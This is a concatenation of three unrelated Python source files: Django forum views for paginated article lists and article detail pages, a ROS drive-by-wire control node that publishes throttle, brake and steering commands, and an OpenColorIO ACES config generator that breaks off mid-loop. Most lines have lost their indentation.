page_articles, pagination_data = paginate_queryset(articles_objs, page_no, ARTICLE_CNT_1PAGE)
return render(request, "article_list.html", {"articles": page_articles, "b": block,
"pagination_data": pagination_data})
def paginate_queryset(objs, page_no, cnt_per_page=10, half_show_length=5):
p = Paginator(objs, cnt_per_page)
if page_no > p.num_pages:
page_no = p.num_pages
if page_no <= 0:
page_no = 1
page_links = [i for i in range(page_no - half_show_length, page_no + half_show_length + 1)
if i > 0 and i <= p.num_pages]
page = p.page(page_no)
previous_link = page_links[0] - 1
next_link = page_links[-1] + 1
pagination_data = {"page_cnt": p.num_pages,
"page_no": page_no,
"page_links": page_links,
"previous_link": previous_link,
"next_link": next_link,
"has_previous": previous_link > 0,
"has_next": next_link <= p.num_pages}
return (page.object_list, pagination_data)
@login_required
def article_create(request, block_id):
block_id = int(block_id)
block = Block.objects.get(id=block_id)
if request.method == "GET":
return render(request, "article_create.html", {"b": block})
else:
form = ArticleForm(request.POST)
if form.is_valid():
article = form.save(commit=False)
article.owner = request.user
article.block = block
article.status = 0
article.save()
return redirect("/article/list/%s" % block_id)
else:
return render(request, "article_create.html", {"b": block, "form": form})
def article_detail(request, article_id):
page_no = int(request.GET.get("page_no", "1"))
article_id = int(article_id)
article = Article.objects.get(id=article_id)
comments = Comment.objects.filter(article=article).order_by("-id")
page_comments, pagination_data = paginate_queryset(comments, page_no, 2)
return render(request, "article_detail.html", {"article": article,
"comments": page_comments,
"pagination_data": pagination_data})
|
#!/usr/bin/env python
# import cte_calculator
from geometry_msgs.msg import PoseStamped
import rospy
from std_msgs.msg import Bool
from styx_msgs.msg import Lane
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
You can build this node only after you have built (or partially built) the `waypoint_updater` node.
You will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.
You can subscribe to any other message that you find important or refer to the document for list
of messages subscribed to by the reference implementation of this node.
One thing to keep in mind while building this node and the `twist_controller` class is the status
of `dbw_enabled`. While in the simulator it is enabled all the time, in the real car that will
not be the case. This may cause your PID controller to accumulate error because the car could
temporarily be driven by a human instead of your controller.
We have provided two launch files with this node. Vehicle-specific values (like vehicle_mass,
wheel_base) should not be altered in these files.
We have also provided some reference implementations for PID controller and other utility classes.
You are free to use them or build your own.
Once you have the proposed throttle, brake, and steer values, publish them on the various publishers
that we have created in the `__init__` function.
'''
class DBWNode(object):
def __init__(self):
rospy.init_node('dbw_node')
vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
brake_deadband = rospy.get_param('~brake_deadband', .1)
decel_limit = rospy.get_param('~decel_limit', -5)
accel_limit = rospy.get_param('~accel_limit', 1.)
wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
wheel_base = rospy.get_param('~wheel_base', 2.8498)
steer_ratio = rospy.get_param('~steer_ratio', 14.8)
max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
SteeringCmd, queue_size=1)
self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
ThrottleCmd, queue_size=1)
self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
BrakeCmd, queue_size=1)
# Subscribe to all the topics you need to
# rospy.Subscriber('/subscriber message name', variable type, callback function, queue_size=1)
        self.twist_sub = rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb, queue_size=1)
        self.velocity_sub = rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb, queue_size=1)
        self.dbw_sub = rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb, queue_size=1)
        self.final_wp_sub = rospy.Subscriber('/final_waypoints', Lane, self.final_waypoints_cb, queue_size=1)
        self.pose_sub = rospy.Subscriber('/current_pose', PoseStamped, self.current_pose_cb, queue_size=1)
        # Create the `Controller` object
self.controller = Controller(vehicle_mass=vehicle_mass,
fuel_capacity = fuel_capacity,
brake_deadband = brake_deadband,
decel_limit = decel_limit,
accel_limit = accel_limit,
wheel_radius = wheel_radius,
wheel_base = wheel_base,
steer_ratio = steer_ratio,
max_lat_accel = max_lat_accel,
max_steer_angle = max_steer_angle)
# self.controller = Controller(<Arguments you wish to provide>)
        # All required topics are already subscribed to above; duplicate subscriptions
        # would make every callback fire twice per message.
self.current_vel = None
self.curr_ang_vel = None
self.dbw_enabled = None
self.linear_vel = None
self.angular_vel = None
self.throttle = self.steering = self.brake = 0
self.loop()
def loop(self):
rate = rospy.Rate(50) # 50Hz
while not rospy.is_shutdown():
# Get predicted throttle, brake, and steering using `twist_controller`
# You should only publish the control commands if dbw is enabled
# throttle, brake, steering = self.controller.control(<proposed linear velocity>,
# <proposed angular velocity>,
# <current linear velocity>,
# <dbw status>,
# <any other argument you need>)
# if <dbw is enabled>:
# self.publish(throttle, brake, steer)
            if None not in (self.current_vel, self.linear_vel, self.angular_vel):
self.throttle, self.brake, self.steering = self.controller.control(
self.current_vel,
self.dbw_enabled,
self.linear_vel,
self.angular_vel)
if self.dbw_enabled:
self.publish(self.throttle, self.brake, self.steering)
rate.sleep()
    def dbw_enabled_cb(self, msg):
        self.dbw_enabled = msg.data
def twist_cb(self, msg):
self.linear_vel = msg.twist.linear.x
self.angular_vel = msg.twist.angular.z
def velocity_cb(self, msg):
self.current_vel = msg.twist.linear.x
def publish(self, throttle, brake, steer):
tcmd = ThrottleCmd()
tcmd.enable = True
tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
tcmd.pedal_cmd = throttle
self.throttle_pub.publish(tcmd)
scmd = SteeringCmd()
scmd.enable = True
scmd.steering_wheel_angle_cmd = steer
self.steer_pub.publish(scmd)
bcmd = BrakeCmd()
bcmd.enable = True
bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
bcmd.pedal_cmd = brake
self.brake_pub.publish(bcmd)
def current_msg_cb(self, message):
self.current_vel = message.twist.linear.x
def final_waypoints_cb(self, message):
self.final_waypoints = message.waypoints
def current_pose_cb(self, message):
self.current_pose = message
if __name__ == '__main__':
DBWNode()
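# A common pattern (a sketch, not required by this node) is to guard start-up against
# ROS interrupt exceptions:
#     if __name__ == '__main__':
#         try:
#             DBWNode()
#         except rospy.ROSInterruptException:
#             rospy.logerr('Could not start dbw_node.')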
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
"""
*aces-dev* Reference Config Generator
=====================================
Defines various objects related to the generation of the *aces-dev* reference
*OpenColorIO* config:
- :func:`opencolorio_config_aces.generate_config_aces`
"""
import csv
import logging
import re
from collections import defaultdict
from datetime import datetime
from enum import Flag, auto
from pathlib import Path
from opencolorio_config_aces.config.generation import (
ConfigData, colorspace_factory, generate_config, look_factory,
view_transform_factory)
from opencolorio_config_aces.config.reference import (
classify_aces_ctl_transforms, discover_aces_ctl_transforms,
unclassify_ctl_transforms)
from opencolorio_config_aces.utilities import git_describe, required
__author__ = 'OpenColorIO Contributors'
__copyright__ = 'Copyright Contributors to the OpenColorIO Project.'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'OpenColorIO Contributors'
__email__ = 'ocio-dev@lists.aswf.io'
__status__ = 'Production'
__all__ = [
'ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH',
'ACES_CONFIG_REFERENCE_COLORSPACE',
'ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE',
'ACES_CONFIG_COLORSPACE_NAME_SEPARATOR',
'ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR',
'ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR',
'ACES_CONFIG_DISPLAY_FAMILY', 'COLORSPACE_NAME_SUBSTITUTION_PATTERNS',
'LOOK_NAME_SUBSTITUTION_PATTERNS',
'TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS',
'VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS',
'DISPLAY_NAME_SUBSTITUTION_PATTERNS', 'ColorspaceDescriptionStyle',
'beautify_name', 'beautify_colorspace_name', 'beautify_look_name',
'beautify_transform_family', 'beautify_view_transform_name',
'beautify_display_name', 'ctl_transform_to_colorspace_name',
'ctl_transform_to_look_name', 'ctl_transform_to_transform_family',
'ctl_transform_to_description', 'ctl_transform_to_colorspace',
'ctl_transform_to_look', 'create_builtin_transform',
'style_to_view_transform', 'style_to_display_colorspace',
'generate_config_aces'
]
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH = (
Path(__file__).parents[0] / 'resources' /
'OpenColorIO-ACES-Config Transforms - Reference Config - Mapping.csv')
"""
Path to the *ACES* *CTL* transforms to *OpenColorIO* colorspaces mapping file.
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH : unicode
"""
ACES_CONFIG_REFERENCE_COLORSPACE = 'ACES2065-1'
"""
*OpenColorIO* config reference colorspace.
ACES_CONFIG_REFERENCE_COLORSPACE : unicode
"""
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE = 'OCES'
"""
*OpenColorIO* config output encoding colorspace.
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE : unicode
"""
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR = ' - '
"""
*OpenColorIO* config colorspace name separator.
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR = '/'
"""
*OpenColorIO* config colorspace family separator.
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR : unicode
"""
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR = '_to_'
"""
*OpenColorIO* config *BuiltinTransform* name separator.
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_DISPLAY_FAMILY = 'Display'
"""
*OpenColorIO* config display family.
ACES_CONFIG_DISPLAY_FAMILY : unicode
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS = {
'ACES_0_1_1': 'ACES 0.1.1',
'ACES_0_2_2': 'ACES 0.2.2',
'ACES_0_7_1': 'ACES 0.7.1',
'_7nits': '',
'_15nits': '',
'_': ' ',
'-raw': '',
'-': ' ',
'\\b(\\w+)limited\\b': '(\\1 Limited)',
'\\b(\\d+)nits\\b': '(\\1 nits)',
'RGBmonitor': 'sRGB',
'Rec709': 'Rec. 709',
'Rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* colorspace name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
COLORSPACE_NAME_SUBSTITUTION_PATTERNS : dict
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS.update({
# Input transforms also use the "family" name and thus need beautifying.
(f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}Alexa'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}v\\d+'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}.*'):
'',
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}':
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR,
})
LOOK_NAME_SUBSTITUTION_PATTERNS = {
# TODO: Implement support for callable patterns.
# The following one should be a dedicated definition/callable.
'BlueLightArtifactFix': 'Blue Light Artifact Fix'
}
"""
*OpenColorIO* look name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
LOOK_NAME_SUBSTITUTION_PATTERNS : dict
"""
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS = {
'\\\\': ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR,
'vendorSupplied[/\\\\]': '',
'arri': 'ARRI',
'alexa': 'Alexa',
'canon': 'Canon',
'panasonic': 'Panasonic',
'red': 'RED',
'sony': 'Sony',
}
"""
*OpenColorIO* transform family substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS : dict
"""
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS = {
'7.2nit': '&',
'15nit': '&',
'lim': ' lim',
'nit': ' nits',
'sim': ' sim on',
'CINEMA': 'Cinema',
'VIDEO': 'Video',
'REC1886': 'Rec.1886',
'REC709': 'Rec.709',
'REC2020': 'Rec.2020',
'-': ' ',
}
"""
*OpenColorIO* view transform name substitution patterns.
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS : dict
"""
DISPLAY_NAME_SUBSTITUTION_PATTERNS = {
'G2.6-': '',
'-BFD': '',
'REC.1886': 'Rec.1886',
'REC.709': 'Rec.709 Video',
'REC.2020': 'Rec.2020 Video',
'REC.2100': 'Rec.2100',
'-Rec.': ' / Rec.',
'-1000nit': '',
# Legacy Substitutions
'dcdm': 'DCDM',
'p3': 'P3',
'rec709': 'Rec. 709',
'rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* display name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
DISPLAY_NAME_SUBSTITUTION_PATTERNS : dict
"""
class ColorspaceDescriptionStyle(Flag):
"""
Enum storing the various *OpenColorIO* colorspace description styles.
"""
NONE = auto()
ACES = auto()
OPENCOLORIO = auto()
SHORT = auto()
LONG = auto()
SHORT_UNION = ACES | OPENCOLORIO | SHORT
LONG_UNION = ACES | OPENCOLORIO | LONG
def beautify_name(name, patterns):
"""
Beautifies given name by applying in succession the given patterns.
Parameters
----------
name : unicode
Name to beautify.
patterns : dict
Dictionary of regular expression patterns and substitution to apply
onto the name.
Returns
-------
unicode
Beautified name.
Examples
--------
>>> beautify_name(
... 'Rec709_100nits_dim',
... COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
'Rec. 709 (100 nits) dim'
"""
for pattern, substitution in patterns.items():
name = re.sub(pattern, substitution, name)
return name.strip()
def beautify_colorspace_name(name):
"""
Beautifies given *OpenColorIO* colorspace name by applying in succession
the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* colorspace name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* colorspace name.
Examples
--------
>>> beautify_colorspace_name('Rec709_100nits_dim')
'Rec. 709 (100 nits) dim'
"""
return beautify_name(name, COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
def beautify_look_name(name):
"""
Beautifies given *OpenColorIO* look name by applying in succession the
relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* look name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* look name.
Examples
--------
>>> beautify_look_name('BlueLightArtifactFix')
'Blue Light Artifact Fix'
"""
return beautify_name(name, LOOK_NAME_SUBSTITUTION_PATTERNS)
def beautify_transform_family(name):
"""
Beautifies given *OpenColorIO* colorspace family by applying in succession
the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* colorspace family to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* colorspace family.
Examples
--------
>>> beautify_transform_family('vendorSupplied/arri/alexa/v3/EI800')
'ARRI/Alexa/v3/EI800'
"""
return beautify_name(name, TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS)
def beautify_view_transform_name(name):
"""
Beautifies given *OpenColorIO* view transform name by applying in
succession the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* view transform name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* view transform name.
Examples
--------
>>> beautify_view_transform_name(
... 'ACES-OUTPUT - ACES2065-1_to_CIE-XYZ-D65 - SDR-CINEMA_1.0')
'Output - SDR Cinema - ACES 1.0'
"""
basename, version = name.split(ACES_CONFIG_COLORSPACE_NAME_SEPARATOR)[
-1].split('_')
tokens = basename.split('-')
family, genus = (['-'.join(tokens[:2]), '-'.join(tokens[2:])]
if len(tokens) > 2 else [basename, None])
family = beautify_name(family, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
genus = (beautify_name(genus, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
if genus is not None else genus)
return (f'Output - {family} ({genus}) - ACES {version}'
if genus is not None else f'Output - {family} - ACES {version}')
def beautify_display_name(name):
"""
Beautifies given *OpenColorIO* display name by applying in succession the
relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* display name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* display name.
Examples
--------
>>> beautify_display_name('DISPLAY - CIE-XYZ-D65_to_sRGB')
'Display - sRGB'
>>> beautify_display_name('rec709')
'Display - Rec. 709'
"""
basename = name.split(ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR)[-1]
name = beautify_name(basename, DISPLAY_NAME_SUBSTITUTION_PATTERNS)
return f'Display - {name}'
def ctl_transform_to_colorspace_name(ctl_transform):
"""
Generates the *OpenColorIO* colorspace name for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace name
for.
Returns
-------
unicode
*OpenColorIO* colorspace name.
"""
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_colorspace_name(name)
def ctl_transform_to_look_name(ctl_transform):
"""
Generates the *OpenColorIO* look name for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* look name for.
Returns
-------
unicode
*OpenColorIO* look name.
"""
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_look_name(name)
def ctl_transform_to_transform_family(ctl_transform, analytical=True):
"""
Generates the *OpenColorIO* transform family for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* transform family
for.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Returns
-------
unicode
*OpenColorIO* transform family.
"""
if analytical:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
family = 'CSC'
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
else:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
if re.match('ACES|ADX', ctl_transform.name):
family = 'ACES'
else:
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
return beautify_transform_family(family)
@required('OpenColorIO')
def ctl_transform_to_description(
ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
factory=colorspace_factory,
**kwargs):
"""
Generates the *OpenColorIO* colorspace or look description for given
*ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
    describe : int, optional
        Any value from the
        :class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
factory : callable, optional
Factory used to adjust the code paths because of slight difference
of signature between the *OpenColorIO* colorspace and look.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
unicode
*OpenColorIO* colorspace or look description.
"""
import PyOpenColorIO as ocio
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
forward, inverse = ([
'to_reference',
'from_reference',
] if factory is colorspace_factory else [
'forward_transform',
'inverse_transform',
])
transforms = [
transform for transform in (kwargs.get(forward),
kwargs.get(inverse))
if transform is not None
]
transform = next(iter(transforms), None)
if isinstance(transform, ocio.BuiltinTransform):
description.append(transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
if len(description) > 0:
description.append('')
aces_transform_id = (
ctl_transform.aces_transform_id.aces_transform_id)
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.append(f'ACEStransformID: {aces_transform_id}')
else:
description.append('CTL Transform')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'{ctl_transform.description}\n')
description.append(f'ACEStransformID: {aces_transform_id}')
description = '\n'.join(description)
return description
def ctl_transform_to_colorspace(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
"""
Generates the *OpenColorIO* colorspace for given *ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
    describe : int, optional
        Any value from the
        :class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* colorspace.
"""
name = ctl_transform_to_colorspace_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
colorspace_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'family':
family,
'description':
description,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
def ctl_transform_to_look(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
"""
Generates the *OpenColorIO* look for given *ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* look for.
    describe : int, optional
        Any value from the
        :class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.look_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* look.
"""
name = ctl_transform_to_look_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
look_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'description':
description,
}
settings.update(kwargs)
look = look_factory(**settings)
return look
@required('OpenColorIO')
def create_builtin_transform(style):
"""
Creates an *OpenColorIO* builtin transform for given style.
If the style does not exist, a placeholder transform is used in place
of the builtin transform.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
Returns
-------
BuiltinTransform
*OpenColorIO* builtin transform for given style.
"""
import PyOpenColorIO as ocio
builtin_transform = ocio.BuiltinTransform()
try:
builtin_transform.setStyle(style)
except ocio.Exception:
logging.warning(f'{style} style is not defined, '
f'using a placeholder "FileTransform" instead!')
builtin_transform = ocio.FileTransform()
builtin_transform.setSrc(style)
return builtin_transform
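# Illustrative usage (a sketch; any registered "BuiltinTransform" style works, and an
# unknown style falls back to the placeholder "FileTransform" described above):
#     transform = create_builtin_transform('ACEScct_to_ACES2065-1')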
@required('OpenColorIO')
def style_to_view_transform(style,
ctl_transforms,
describe=ColorspaceDescriptionStyle.LONG_UNION):
"""
Creates an *OpenColorIO* view transform for given style.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
ctl_transforms : array_like
Array of :class:`opencolorio_config_aces.config.reference.CTLTransform`
class instances corresponding to the given style.
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
Returns
-------
ViewTransform
*OpenColorIO* view transform for given style.
"""
import PyOpenColorIO as ocio
name = beautify_view_transform_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
aces_transform_ids, aces_descriptions = zip(
*[(ctl_transform.aces_transform_id.aces_transform_id,
ctl_transform.description)
for ctl_transform in ctl_transforms])
if len(description) > 0:
description.append('')
if describe in (ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.extend([
f'ACEStransformID: {aces_transform_id}'
for aces_transform_id in aces_transform_ids
])
else:
description.append(
f'CTL Transform'
f'{"s" if len(aces_transform_ids) >= 2 else ""}')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'\n{"-" * 80}\n\n'.join([
(f'{aces_descriptions[i]}\n\n'
f'ACEStransformID: {aces_transform_id}\n')
for i, aces_transform_id in enumerate(aces_transform_ids)
]))
description = '\n'.join(description)
view_transform = view_transform_factory(
name, from_reference=builtin_transform, description=description)
return view_transform
@required('OpenColorIO')
def style_to_display_colorspace(
style, describe=ColorspaceDescriptionStyle.OPENCOLORIO, **kwargs):
"""
Creates an *OpenColorIO* display colorspace for given style.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* display colorspace for given style.
"""
import PyOpenColorIO as ocio
kwargs.setdefault('family', ACES_CONFIG_DISPLAY_FAMILY)
name = beautify_display_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
description = '\n'.join(description)
settings = {
'name': name,
'family': ACES_CONFIG_DISPLAY_FAMILY,
'description': description,
'from_reference': builtin_transform,
'reference_space': ocio.REFERENCE_SPACE_DISPLAY,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
@required('OpenColorIO')
def generate_config_aces(
config_name=None,
validate=True,
describe=ColorspaceDescriptionStyle.SHORT_UNION,
config_mapping_file_path=ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH,
analytical=True,
additional_data=False):
"""
Generates the *aces-dev* reference implementation *OpenColorIO* Config
using the *Mapping* method.
The Config generation is constrained by a *CSV* file exported from the
*Reference Config - Mapping* sheet from a
`Google Sheets file <https://docs.google.com/spreadsheets/d/\
1SXPt-USy3HlV2G2qAvh9zit6ZCINDOlfKT07yXJdWLg>`__. The *Google Sheets* file
was originally authored using the output of the *aces-dev* conversion graph
to support the discussions of the *OpenColorIO* *Working Group* on the
design of the *aces-dev* reference implementation *OpenColorIO* Config.
The resulting mapping is the outcome of those discussions and leverages the
new *OpenColorIO 2* display architecture while factoring many transforms.
Parameters
----------
config_name : unicode, optional
*OpenColorIO* config file name, if given the config will be written to
disk.
validate : bool, optional
Whether to validate the config.
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
config_mapping_file_path : unicode, optional
Path to the *CSV* mapping file used by the *Mapping* method.
analytical : bool, optional
Whether to generate *OpenColorIO* transform families that analytically
match the given *ACES* *CTL* transform, i.e. true to the *aces-dev*
reference but not necessarily user friendly.
additional_data : bool, optional
Whether to return additional data.
Returns
-------
Config or tuple
*OpenColorIO* config or tuple of *OpenColorIO* config,
:class:`opencolorio_config_aces.ConfigData` class instance and dict of
*OpenColorIO* colorspaces and
:class:`opencolorio_config_aces.config.reference.CTLTransform` class
instances.
"""
import PyOpenColorIO as ocio
ctl_transforms = unclassify_ctl_transforms(
classify_aces_ctl_transforms(discover_aces_ctl_transforms()))
builtin_transforms = [
builtin for builtin in ocio.BuiltinTransformRegistry()
]
config_mapping = defaultdict(list)
with open(config_mapping_file_path) as csv_file:
dict_reader = csv.DictReader(
csv_file,
delimiter=',',
fieldnames=[
'ordering',
'aces_transform_id',
'builtin_transform_style',
'linked_display_colorspace_style',
'interface',
'encoding',
'categories',
])
# Skipping the first header line.
next(dict_reader)
for transform_data in dict_reader:
# Checking whether the "BuiltinTransform" style exists.
style = transform_data['builtin_transform_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
# Checking whether the linked "DisplayColorspace"
# "BuiltinTransform" style exists.
style = transform_data['linked_display_colorspace_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
# Finding the "CTLTransform" class instance that matches given
